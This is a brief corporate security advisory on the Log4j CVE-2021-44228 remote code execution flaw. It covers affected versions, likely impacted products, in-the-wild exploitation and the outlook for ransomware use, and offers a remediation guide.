On December 9, 2021 at 2:25 am, an exploit that impacts Apache Log4j version 2 was published by “@P0rZ9” on Twitter, along with proof of concept (PoC) code on GitHub. Since this initial publication, a CVE (CVE-2021-44228) was logged for the vulnerability within “Log4j” version 2.
This vulnerability occurs when Apache Log4j parses user input that contains malicious code, which causes Apache Log4j to execute the malicious code. This vulnerability is not a problem with the Apache webserver software; Log4j is not part of the Apache webserver. Any string logged via Log4j could potentially be used to exploit this vulnerability.
To date, these strings have predominantly contained URL’s that cause Apache Log4j to fetch content on an attacker’s hosted website, which is then retrieved by the vulnerable Apache Log4j model and executed on the system running Apache Log4j. The result of this vulnerability would give an attacker control of the system the exploit was executed on, and this would result in complete system compromise. It is also likely that threat actors could use this compromised system to move laterally.
Reporting to date has shown that this vulnerability is already being scanned and exploited in the wild. Victims have seen a combination of security researchers scanning for the vulnerability and threat actors using it to conduct resource hijacking, such as installing Coin Miners and installing Cobalt Strike on systems.
It is essential to understand that Apache Log4j could be used in software developed by your organization and software provided by many software vendors. If you cannot directly patch or mitigate this vulnerability, you should actively detect exploitation attempts.
What software is impacted?
- Systems running Apache Log4j version 2.0-beta to version 2.14.1 are vulnerable to this exploit.
Apache Log4j may be used in many Apache-based systems that are public-facing to the internet. These systems are used wildly by various cloud servers and vendors. To date, the systems that are likely impacted include; Struts 2, Solr, Druid, Flink, and Swift.
What is the outlook for this vulnerability?Given we’ve already seen threat actors scanning for this vulnerability and exploitation already occurring in the wild, more threat actors will likely start to leverage this exploit. While there have not been any reports of ransomware threat actors leveraging this vulnerability, they will likely use it to gain initial access to victims in the coming days/weeks.
Download below a guide that Ankura's Cybersecurity & Data Privacy team has put together to identify potential vulnerabilities and compromises and take the necessary remediation steps.
© Copyright 2021. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.